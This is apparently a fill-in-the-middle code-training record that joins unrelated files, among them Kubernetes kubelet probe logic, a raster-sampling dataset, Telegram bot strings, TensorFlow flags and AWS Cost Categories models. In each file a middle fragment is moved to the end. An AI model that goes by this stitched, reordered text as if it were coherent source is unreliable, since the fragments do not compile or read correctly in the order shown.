#[derive(Eq, PartialEq, Hash, Copy, Clone, Debug)]
enum RegionTarget<'tcx> {
Region(Region<'tcx>),
RegionVid(RegionVid)
}
#[derive(Default, Debug, Clone)]
struct RegionDeps<'tcx> {
larger: FxHashSet<RegionTarget<'tcx>>,
smaller: FxHashSet<RegionTarget<'tcx>>
}
#[derive(Eq, PartialEq, Hash, Debug)]
enum SimpleBound {
TraitBound(Vec<PathSegment>, Vec<SimpleBound>, Vec<GenericParamDef>, hir::TraitBoundModifier),
Outlives(Lifetime),
}
enum AutoTraitResult {
ExplicitImpl,
PositiveImpl(Generics),
NegativeImpl,
}
impl AutoTraitResult {
fn is_auto(&self) -> bool {
match *self {
AutoTraitResult::PositiveImpl(_) | AutoTraitResult::NegativeImpl => true,
_ => false,
}
}
}
impl From<GenericBound> for SimpleBound {
fn from(bound: GenericBound) -> Self {
match bound.clone() {
GenericBound::Outlives(l) => SimpleBound::Outlives(l),
GenericBound::TraitBound(t, mod_) => match t.trait_ {
Type::ResolvedPath { path, typarams, .. } => {
SimpleBound::TraitBound(path.segments,
typarams
.map_or_else(|| Vec::new(), |v| v.iter()
.map(|p| SimpleBound::from(p.clone()))
.collect()),
t.generic_params,
mod_)
}
_ => panic!("Unexpected bound {:?}", bound),
}
}
}
} | }
impl<'tcx> Clean<Option<Vec<GenericBound>>> for Substs<'tcx> { |
prober.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package prober
import (
"fmt"
"io"
"net"
"net/http"
"net/url"
"strconv"
"strings"
"time"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
"k8s.io/client-go/tools/record"
kubecontainer "k8s.io/kubernetes/pkg/kubelet/container"
"k8s.io/kubernetes/pkg/kubelet/events"
"k8s.io/kubernetes/pkg/kubelet/prober/results"
"k8s.io/kubernetes/pkg/kubelet/util/format"
"k8s.io/kubernetes/pkg/probe"
execprobe "k8s.io/kubernetes/pkg/probe/exec"
httpprobe "k8s.io/kubernetes/pkg/probe/http"
tcpprobe "k8s.io/kubernetes/pkg/probe/tcp"
"k8s.io/utils/exec"
"k8s.io/klog/v2"
)
const maxProbeRetries = 3
// Prober helps to check the liveness/readiness/startup of a container.
type prober struct {
exec execprobe.Prober
// probe types needs different httpprobe instances so they don't
// share a connection pool which can cause collisions to the
// same host:port and transient failures. See #49740.
readinessHTTP httpprobe.Prober
livenessHTTP httpprobe.Prober
startupHTTP httpprobe.Prober
tcp tcpprobe.Prober
runner kubecontainer.CommandRunner
recorder record.EventRecorder
}
// NewProber creates a Prober, it takes a command runner and
// several container info managers.
func newProber(
runner kubecontainer.CommandRunner,
recorder record.EventRecorder) *prober {
const followNonLocalRedirects = false
return &prober{
exec: execprobe.New(),
readinessHTTP: httpprobe.New(followNonLocalRedirects),
livenessHTTP: httpprobe.New(followNonLocalRedirects),
startupHTTP: httpprobe.New(followNonLocalRedirects),
tcp: tcpprobe.New(),
runner: runner,
recorder: recorder,
}
}
// recordContainerEvent should be used by the prober for all container related events.
func (pb *prober) recordContainerEvent(pod *v1.Pod, container *v1.Container, eventType, reason, message string, args ...interface{}) {
ref, err := kubecontainer.GenerateContainerRef(pod, container)
if err != nil {
klog.ErrorS(err, "Can't make a ref to pod and container", "pod", klog.KObj(pod), "containerName", container.Name)
return
}
pb.recorder.Eventf(ref, eventType, reason, message, args...)
}
// probe probes the container.
func (pb *prober) probe(probeType probeType, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID) (results.Result, error) {
var probeSpec *v1.Probe
switch probeType {
case readiness:
probeSpec = container.ReadinessProbe
case liveness:
probeSpec = container.LivenessProbe
case startup:
probeSpec = container.StartupProbe
default:
return results.Failure, fmt.Errorf("unknown probe type: %q", probeType)
}
if probeSpec == nil {
klog.InfoS("Probe is nil", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
return results.Success, nil
}
result, output, err := pb.runProbeWithRetries(probeType, probeSpec, pod, status, container, containerID, maxProbeRetries)
if err != nil || (result != probe.Success && result != probe.Warning) {
// Probe failed in one way or another.
if err != nil {
klog.V(1).ErrorS(err, "Probe errored", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerUnhealthy, "%s probe errored: %v", probeType, err)
} else { // result != probe.Success
klog.V(1).InfoS("Probe failed", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name, "probeResult", result, "output", output)
pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerUnhealthy, "%s probe failed: %s", probeType, output)
}
return results.Failure, err
}
if result == probe.Warning {
pb.recordContainerEvent(pod, &container, v1.EventTypeWarning, events.ContainerProbeWarning, "%s probe warning: %s", probeType, output)
klog.V(3).InfoS("Probe succeeded with a warning", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name, "output", output)
} else {
klog.V(3).InfoS("Probe succeeded", "probeType", probeType, "pod", klog.KObj(pod), "podUID", pod.UID, "containerName", container.Name)
}
return results.Success, nil
}
// runProbeWithRetries tries to probe the container in a finite loop, it returns the last result
// if it never succeeds.
func (pb *prober) runProbeWithRetries(probeType probeType, p *v1.Probe, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID, retries int) (probe.Result, string, error) {
var err error
var result probe.Result
var output string
for i := 0; i < retries; i++ {
result, output, err = pb.runProbe(probeType, p, pod, status, container, containerID)
if err == nil {
return result, output, nil
}
}
return result, output, err
}
// buildHeaderMap takes a list of HTTPHeader <name, value> string
// pairs and returns a populated string->[]string http.Header map.
func buildHeader(headerList []v1.HTTPHeader) http.Header {
headers := make(http.Header)
for _, header := range headerList {
headers[header.Name] = append(headers[header.Name], header.Value)
}
return headers
}
func (pb *prober) runProbe(probeType probeType, p *v1.Probe, pod *v1.Pod, status v1.PodStatus, container v1.Container, containerID kubecontainer.ContainerID) (probe.Result, string, error) {
timeout := time.Duration(p.TimeoutSeconds) * time.Second
if p.Exec != nil {
klog.V(4).InfoS("Exec-Probe runProbe", "pod", klog.KObj(pod), "containerName", container.Name, "execCommand", p.Exec.Command)
command := kubecontainer.ExpandContainerCommandOnlyStatic(p.Exec.Command, container.Env)
return pb.exec.Probe(pb.newExecInContainer(container, containerID, command, timeout))
}
if p.HTTPGet != nil {
scheme := strings.ToLower(string(p.HTTPGet.Scheme))
host := p.HTTPGet.Host
if host == "" {
host = status.PodIP
}
port, err := extractPort(p.HTTPGet.Port, container)
if err != nil {
return probe.Unknown, "", err
}
path := p.HTTPGet.Path
klog.V(4).InfoS("HTTP-Probe Host", "scheme", scheme, "host", host, "port", port, "path", path)
url := formatURL(scheme, host, port, path)
headers := buildHeader(p.HTTPGet.HTTPHeaders)
klog.V(4).InfoS("HTTP-Probe Headers", "headers", headers)
switch probeType {
case liveness:
return pb.livenessHTTP.Probe(url, headers, timeout)
case startup:
return pb.startupHTTP.Probe(url, headers, timeout)
default:
return pb.readinessHTTP.Probe(url, headers, timeout)
}
}
if p.TCPSocket != nil {
port, err := extractPort(p.TCPSocket.Port, container)
if err != nil {
return probe.Unknown, "", err
}
host := p.TCPSocket.Host
if host == "" {
host = status.PodIP
}
klog.V(4).InfoS("TCP-Probe Host", "host", host, "port", port, "timeout", timeout)
return pb.tcp.Probe(host, port, timeout)
}
klog.InfoS("Failed to find probe builder for container", "containerName", container.Name)
return probe.Unknown, "", fmt.Errorf("missing probe handler for %s:%s", format.Pod(pod), container.Name)
}
func extractPort(param intstr.IntOrString, container v1.Container) (int, error) |
// findPortByName is a helper function to look up a port in a container by name.
func findPortByName(container v1.Container, portName string) (int, error) {
for _, port := range container.Ports {
if port.Name == portName {
return int(port.ContainerPort), nil
}
}
return 0, fmt.Errorf("port %s not found", portName)
}
// formatURL formats a URL from args. For testability.
func formatURL(scheme string, host string, port int, path string) *url.URL {
u, err := url.Parse(path)
// Something is busted with the path, but it's too late to reject it. Pass it along as is.
if err != nil {
u = &url.URL{
Path: path,
}
}
u.Scheme = scheme
u.Host = net.JoinHostPort(host, strconv.Itoa(port))
return u
}
type execInContainer struct {
// run executes a command in a container. Combined stdout and stderr output is always returned. An
// error is returned if one occurred.
run func() ([]byte, error)
writer io.Writer
}
func (pb *prober) newExecInContainer(container v1.Container, containerID kubecontainer.ContainerID, cmd []string, timeout time.Duration) exec.Cmd {
return &execInContainer{run: func() ([]byte, error) {
return pb.runner.RunInContainer(containerID, cmd, timeout)
}}
}
func (eic *execInContainer) Run() error {
return nil
}
func (eic *execInContainer) CombinedOutput() ([]byte, error) {
return eic.run()
}
func (eic *execInContainer) Output() ([]byte, error) {
return nil, fmt.Errorf("unimplemented")
}
func (eic *execInContainer) SetDir(dir string) {
//unimplemented
}
func (eic *execInContainer) SetStdin(in io.Reader) {
//unimplemented
}
func (eic *execInContainer) SetStdout(out io.Writer) {
eic.writer = out
}
func (eic *execInContainer) SetStderr(out io.Writer) {
eic.writer = out
}
func (eic *execInContainer) SetEnv(env []string) {
//unimplemented
}
func (eic *execInContainer) Stop() {
//unimplemented
}
func (eic *execInContainer) Start() error {
data, err := eic.run()
if eic.writer != nil {
eic.writer.Write(data)
}
return err
}
func (eic *execInContainer) Wait() error {
return nil
}
func (eic *execInContainer) StdoutPipe() (io.ReadCloser, error) {
return nil, fmt.Errorf("unimplemented")
}
func (eic *execInContainer) StderrPipe() (io.ReadCloser, error) {
return nil, fmt.Errorf("unimplemented")
}
| {
port := -1
var err error
switch param.Type {
case intstr.Int:
port = param.IntValue()
case intstr.String:
if port, err = findPortByName(container, param.StrVal); err != nil {
// Last ditch effort - maybe it was an int stored as string?
if port, err = strconv.Atoi(param.StrVal); err != nil {
return port, err
}
}
default:
return port, fmt.Errorf("intOrString had no kind: %+v", param)
}
if port > 0 && port < 65536 {
return port, nil
}
return port, fmt.Errorf("invalid port number: %v", port)
} |
raster.py | import os
import rasterio
import numpy as np
from ..utils import pair, bytescale
from .base import BaseRasterData
class RasterSampleDataset(BaseRasterData):
"""Dataset wrapper for remote sensing data.
Args:
fname:
win_size:
step_size:
pad_size:
band_index:
"""
def __init__(self,
fname,
win_size=512,
step_size=512,
pad_size=0,
band_index=None,
to_type=None,
data_format='channel_last',
transform=None):
super().__init__(fname=fname)
assert data_format in (
'channel_first',
'channel_last'), "data format must be 'channel_first' or "
f"'channel_last', but got type {data_format}"
self.data_format = data_format
self.win_size = pair(win_size)
self.step_size = pair(step_size)
self.pad_size = pair(pad_size)
total_band_index = [i + 1 for i in range(self.count)]
if band_index is None:
self.band_index = total_band_index
else:
assert set(band_index).issubset(set(total_band_index))
self.band_index = band_index
self.to_type = to_type
self.window_ids = self.get_windows_info()
self.transform = transform
self.start = 0
self.end = len(self)
def get_windows_info(self):
left, top = 0, 0
width, height = self.width, self.height
left_top_xy = [] # left-top corner coordinates (xmin, ymin)
while left < width:
if left + self.win_size[0] >= width:
left = max(width - self.win_size[0], 0)
top = 0
while top < height:
if top + self.win_size[1] >= height:
top = max(height - self.win_size[1], 0)
# right = min(left + self.win_size[0], width - 1)
# bottom = min(top + self.win_size[1], height - 1)
# save
left_top_xy.append((left, top))
if top + self.win_size[1] >= height:
break
else:
top += self.step_size[1]
if left + self.win_size[0] >= width:
break
else:
left += self.step_size[0]
return left_top_xy
def sample(self, x, y):
"""Get the values of dataset at certain positions.
"""
xmin, ymin = x, y
xsize, ysize = self.win_size
xpad, ypad = self.pad_size
xmin -= xpad
ymin -= ypad
left, top = 0, 0
if xmin < 0:
xmin = 0
xsize += xpad
left = xpad
elif xmin + xsize + 2 * xpad > self.width:
xsize += xpad
else:
xsize += 2 * xpad
if ymin < 0:
ymin = 0
ysize += ypad
top = ypad
elif ymin + ysize + 2 * ypad > self.height:
ysize += ypad
else:
ysize += 2 * ypad
# col_off, row_off, width, height
window = rasterio.windows.Window(xmin, ymin, xsize, ysize)
# with rasterio.open(self.image_file) as src:
# bands = [src.read(k, window=tile_window) for k in self.band_index]
# tile_image = np.stack(bands, axis=-1)
bands = [self._band.read(k, window=window) for k in self.band_index]
if self.to_type and np.dtype(self.to_type) != np.dtype(self.dtype):
bmin, bmax = self.minmax
msks = [
self._band.read_masks(k, window=window)
for k in self.band_index
]
bands = [
bytescale(b, msk, bmin[i], bmax[i], dtype=self.to_type)
for i, (b, msk) in enumerate(zip(bands, msks))
]
tile_image = np.stack(bands, axis=-1)
img = np.zeros(
(self.win_size[0] + 2 * xpad, self.win_size[0] + 2 * ypad,
len(self.band_index)),
dtype=tile_image.dtype)
img[top:top + ysize, left:left + xsize] = tile_image
if self.data_format == 'channel_first':
img = img.transpose(2, 0, 1)
return img
def __getitem__(self, idx):
x, y = self.window_ids[idx]
img = self.sample(x, y)
if self.transform is not None:
img = self.transform(img)
return img, x, y
def | (self):
return len(self.window_ids)
@property
def step(self):
return self.step_size
@property
def pad(self):
return self.pad_size
| __len__ |
main_test.go | package main
import "testing"
type args struct {
s string
t string
}
var tests = []struct {
name string
args args
want bool
}{
{"test ok", args{"egg", "add"}, true},
{"test fail", args{"foo", "tar"}, false},
{"test ok", args{"paper", "title"}, true},
{"test ok", args{"ab", "aa"}, false},
{"test ok", args{"bar", "foo"}, false},
}
func | (t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
if got := isIsomorphic(tt.args.s, tt.args.t); got != tt.want {
t.Errorf("isIsomorphic() = %v, want %v", got, tt.want)
}
})
}
}
| Test_isIsomorphic |
translation.py | class Translation(object):
START_TEXT = """<b>Hai {}!!!</b>
<code>Im Simple Telegraph Uploader Bot😜</code>
<b>» You Must Join My Updates Channel for using me</b>
<i>Click Help Button For More Details</i>"""
HELP_TEXT = """<b>Hey {}!!!,Please Folow these Steps</b>
➥ <code>Send any Image, Gif or Video(Mp4 Only) below 5MB.</code> | /help - <b>How To Use Me</b>
/about - <b>More About Me</b>"""
ABOUT_TEXT = """**➥ My Name** : ```Telegraph Bot```
**➥ Creator** : <a href=https://t.me/D_ar_k_Angel>Dark Angel</a>
**➥ Credits** : ```Everyone in this journey```
**➥ Language** : ```Python3```
**➥ Library** : <a href=https://docs.pyrogram.org>Pyrogram asyncio 0.18.0</a>
**➥ Server** : ```Heroku```
**➥ Build Status** : ```V01.1 [BETA]```""" | ➥ <code>Bot will send you the Telegra.ph link.</code>
<b>Available Commands</b>
/start - <b>Checking Bot Online</b> |
import.rs | use crate::model::complex_types::t_import;
// wsdl:import
// Element information
// Namespace: http://schemas.xmlsoap.org/wsdl/
// Schema document: wsdl11.xsd
// Type: wsdl:tImport
// Properties: Local, Qualified
//
// Content
// wsdl:documentation [0..1] from type wsdl:tDocumented
// | // Used in
// Group wsdl:anyTopLevelOptionalElement
// Type wsdl:tDefinitions via reference to wsdl:anyTopLevelOptionalElement (Element wsdl:definitions)
// Sample instance
// <wsdl:import namespace="http://example.com/stockquote/schemas"
// location="http://example.com/stockquote/stockquote.xsd"/>
pub type Import<'a> = t_import::Import<'a>; | // Attributes
// Any attribute [0..*] Namespace: ##other, Process Contents: lax from type wsdl:tExtensibleAttributesDocumented
// namespace [1..1] xsd:anyURI
// location [1..1] xsd:anyURI |
flags.py |
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
def | ():
############
# Run mode
############
tf.app.flags.DEFINE_string('run', None, "Which operation to run. [train|inference]")
##########################
# Training parameters
###########################
tf.app.flags.DEFINE_integer('nb_epoch', 400, "Number of epochs")
tf.app.flags.DEFINE_integer('batch_size', 64, "Number of samples per batch.")
tf.app.flags.DEFINE_integer('nb_batch_per_epoch', 500, "Number of batches per epoch")
tf.app.flags.DEFINE_float('learning_rate', 2E-4, "Learning rate used for AdamOptimizer")
tf.app.flags.DEFINE_integer('noise_dim', 100, "Noise dimension for GAN generation")
tf.app.flags.DEFINE_integer('random_seed', 0, "Seed used to initialize rng.")
############################################
# General tensorflow parameters parameters
#############################################
tf.app.flags.DEFINE_bool('use_XLA', False, "Whether to use XLA compiler.")
tf.app.flags.DEFINE_integer('num_threads', 2, "Number of threads to fetch the data")
tf.app.flags.DEFINE_float('capacity_factor', 32, "Nuumber of batches to store in queue")
##########
# Datasets
##########
tf.app.flags.DEFINE_string('data_format', "NCHW", "Tensorflow image data format.")
tf.app.flags.DEFINE_string('celebA_path', "../../data/raw/img_align_celeba", "Path to celebA images")
tf.app.flags.DEFINE_integer('channels', 3, "Number of channels")
tf.app.flags.DEFINE_float('central_fraction', 0.8, "Central crop as a fraction of total image")
tf.app.flags.DEFINE_integer('img_size', 64, "Image size")
##############
# Directories
##############
tf.app.flags.DEFINE_string('model_dir', '../../models', "Output folder where checkpoints are dumped.")
tf.app.flags.DEFINE_string('log_dir', '../../logs', "Logs for tensorboard.")
tf.app.flags.DEFINE_string('fig_dir', '../../figures', "Where to save figures.")
tf.app.flags.DEFINE_string('raw_dir', '../../data/raw', "Where raw data is saved")
tf.app.flags.DEFINE_string('data_dir', '../../data/processed', "Where processed data is saved")
| define_flags |
index.d.ts | export type Unwatch = () => void
export declare class Path<T> {
set(value: T): void
get(): T
watch(fn: (state: T) => void): Unwatch
unwatch: Unwatch
batch(fn: (path: Path<T>) => void): void
getPath(): string
getPathFull(): string[]
path<K extends keyof T>(key: K): Path<T[K]>
} | export declare function path<T>(name: string, defaultState: T): Path<T> |
|
consumption_management_client_enums.py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class | (Enum):
daily_grain = "daily"
monthly_grain = "monthly"
| Datagrain |
model.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
/// <p>Use the split charge rule to split the cost of one Cost Category value across several
/// other target values. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategorySplitChargeRule {
/// <p>The Cost Category value that you want to split. That value can't be used as a source
/// or a target in other split charge rules. To indicate uncategorized costs, you can use an empty string as the source.</p>
pub source: std::option::Option<std::string::String>,
/// <p>The Cost Category values that you want to split costs across. These values can't be
/// used as a source in other split charge rules. </p>
pub targets: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The method that's used to define how to split your source costs across your targets. </p>
/// <p>
/// <code>Proportional</code> - Allocates charges across your targets based on the
/// proportional weighted cost of each target.</p>
/// <p>
/// <code>Fixed</code> - Allocates charges across your targets based on your defined
/// allocation percentage.</p>
/// <p>><code>Even</code> - Allocates costs evenly across all targets.</p>
pub method: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
/// <p>The parameters for a split charge method. This is only required for the
/// <code>FIXED</code> method. </p>
pub parameters:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>>,
}
impl std::fmt::Debug for CostCategorySplitChargeRule {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategorySplitChargeRule");
formatter.field("source", &self.source);
formatter.field("targets", &self.targets);
formatter.field("method", &self.method);
formatter.field("parameters", &self.parameters);
formatter.finish()
}
}
/// See [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub mod cost_category_split_charge_rule {
/// A builder for [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) source: std::option::Option<std::string::String>,
pub(crate) targets: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) method: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
pub(crate) parameters:
std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>>,
}
impl Builder {
/// <p>The Cost Category value that you want to split. That value can't be used as a source
/// or a target in other split charge rules. To indicate uncategorized costs, you can use an empty string as the source.</p>
pub fn source(mut self, input: impl Into<std::string::String>) -> Self {
self.source = Some(input.into());
self
}
pub fn set_source(mut self, input: std::option::Option<std::string::String>) -> Self {
self.source = input;
self
}
pub fn targets(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.targets.unwrap_or_default();
v.push(input.into());
self.targets = Some(v);
self
}
pub fn set_targets(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.targets = input;
self
}
/// <p>The method that's used to define how to split your source costs across your targets. </p>
/// <p>
/// <code>Proportional</code> - Allocates charges across your targets based on the
/// proportional weighted cost of each target.</p>
/// <p>
/// <code>Fixed</code> - Allocates charges across your targets based on your defined
/// allocation percentage.</p>
/// <p>><code>Even</code> - Allocates costs evenly across all targets.</p>
pub fn method(mut self, input: crate::model::CostCategorySplitChargeMethod) -> Self {
self.method = Some(input);
self
}
pub fn set_method(
mut self,
input: std::option::Option<crate::model::CostCategorySplitChargeMethod>,
) -> Self {
self.method = input;
self
}
pub fn parameters(
mut self,
input: impl Into<crate::model::CostCategorySplitChargeRuleParameter>,
) -> Self {
let mut v = self.parameters.unwrap_or_default();
v.push(input.into());
self.parameters = Some(v);
self
}
pub fn set_parameters(
mut self,
input: std::option::Option<
std::vec::Vec<crate::model::CostCategorySplitChargeRuleParameter>,
>,
) -> Self {
self.parameters = input;
self
}
/// Consumes the builder and constructs a [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub fn build(self) -> crate::model::CostCategorySplitChargeRule {
crate::model::CostCategorySplitChargeRule {
source: self.source,
targets: self.targets,
method: self.method,
parameters: self.parameters,
}
}
}
}
impl CostCategorySplitChargeRule {
/// Creates a new builder-style object to manufacture [`CostCategorySplitChargeRule`](crate::model::CostCategorySplitChargeRule)
pub fn builder() -> crate::model::cost_category_split_charge_rule::Builder {
crate::model::cost_category_split_charge_rule::Builder::default()
}
}
/// <p>The parameters for a split charge method. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategorySplitChargeRuleParameter {
/// <p>The parameter type. </p>
pub r#type: std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
/// <p>The parameter values. </p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl std::fmt::Debug for CostCategorySplitChargeRuleParameter {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategorySplitChargeRuleParameter");
formatter.field("r#type", &self.r#type);
formatter.field("values", &self.values);
formatter.finish()
}
}
/// See [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub mod cost_category_split_charge_rule_parameter {
/// A builder for [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) r#type:
std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
/// <p>The parameter type. </p>
pub fn r#type(
mut self,
input: crate::model::CostCategorySplitChargeRuleParameterType,
) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::CostCategorySplitChargeRuleParameterType>,
) -> Self {
self.r#type = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
/// Consumes the builder and constructs a [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub fn build(self) -> crate::model::CostCategorySplitChargeRuleParameter {
crate::model::CostCategorySplitChargeRuleParameter {
r#type: self.r#type,
values: self.values,
}
}
}
}
impl CostCategorySplitChargeRuleParameter {
/// Creates a new builder-style object to manufacture [`CostCategorySplitChargeRuleParameter`](crate::model::CostCategorySplitChargeRuleParameter)
pub fn builder() -> crate::model::cost_category_split_charge_rule_parameter::Builder {
crate::model::cost_category_split_charge_rule_parameter::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategorySplitChargeRuleParameterType {
AllocationPercentages,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategorySplitChargeRuleParameterType {
fn from(s: &str) -> Self {
match s {
"ALLOCATION_PERCENTAGES" => {
CostCategorySplitChargeRuleParameterType::AllocationPercentages
}
other => CostCategorySplitChargeRuleParameterType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategorySplitChargeRuleParameterType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategorySplitChargeRuleParameterType::from(s))
}
}
impl CostCategorySplitChargeRuleParameterType {
pub fn as_str(&self) -> &str {
match self {
CostCategorySplitChargeRuleParameterType::AllocationPercentages => {
"ALLOCATION_PERCENTAGES"
}
CostCategorySplitChargeRuleParameterType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["ALLOCATION_PERCENTAGES"]
}
}
impl AsRef<str> for CostCategorySplitChargeRuleParameterType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategorySplitChargeMethod {
Even,
Fixed,
Proportional,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategorySplitChargeMethod {
fn from(s: &str) -> Self {
match s {
"EVEN" => CostCategorySplitChargeMethod::Even,
"FIXED" => CostCategorySplitChargeMethod::Fixed,
"PROPORTIONAL" => CostCategorySplitChargeMethod::Proportional,
other => CostCategorySplitChargeMethod::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategorySplitChargeMethod {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategorySplitChargeMethod::from(s))
}
}
impl CostCategorySplitChargeMethod {
pub fn as_str(&self) -> &str {
match self {
CostCategorySplitChargeMethod::Even => "EVEN",
CostCategorySplitChargeMethod::Fixed => "FIXED",
CostCategorySplitChargeMethod::Proportional => "PROPORTIONAL",
CostCategorySplitChargeMethod::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["EVEN", "FIXED", "PROPORTIONAL"]
}
}
impl AsRef<str> for CostCategorySplitChargeMethod {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Rules are processed in order. If there are multiple rules that match the line item,
/// then the first rule to match is used to determine that Cost Category value.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryRule {
/// <p>The
/// default value for the cost category.</p>
pub value: std::option::Option<std::string::String>,
/// <p>An <a href="https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_Expression.html">Expression</a>
/// object used to categorize costs. This supports dimensions, tags, and nested expressions.
/// Currently the only dimensions supported are <code>LINKED_ACCOUNT</code>,
/// <code>SERVICE_CODE</code>, <code>RECORD_TYPE</code>, and
/// <code>LINKED_ACCOUNT_NAME</code>.</p>
/// <p>Root level <code>OR</code> isn't supported. We recommend that you create a separate
/// rule instead.</p>
/// <p>
/// <code>RECORD_TYPE</code> is a dimension used for Cost Explorer APIs, and is also
/// supported for Cost Category expressions. This dimension uses different terms, depending
/// on whether you're using the console or API/JSON editor. For a detailed comparison, see
/// <a href="https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/manage-cost-categories.html#cost-categories-terms">Term Comparisons</a> in the <i>Billing and Cost Management User
/// Guide</i>.</p>
pub rule: std::option::Option<crate::model::Expression>,
/// <p>The value the line item is categorized as if the line item contains the matched
/// dimension.</p>
pub inherited_value: std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
/// <p>You can define the <code>CostCategoryRule</code> rule type as either
/// <code>REGULAR</code> or <code>INHERITED_VALUE</code>. The
/// <code>INHERITED_VALUE</code> rule type adds the flexibility of defining a rule that
/// dynamically inherits the cost category value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs based on the value of a specific tag key, first choose an
/// inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
pub r#type: std::option::Option<crate::model::CostCategoryRuleType>,
}
impl std::fmt::Debug for CostCategoryRule {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryRule");
formatter.field("value", &self.value);
formatter.field("rule", &self.rule);
formatter.field("inherited_value", &self.inherited_value);
formatter.field("r#type", &self.r#type);
formatter.finish()
}
}
/// See [`CostCategoryRule`](crate::model::CostCategoryRule)
pub mod cost_category_rule {
/// A builder for [`CostCategoryRule`](crate::model::CostCategoryRule)
#[non_exhaustive]
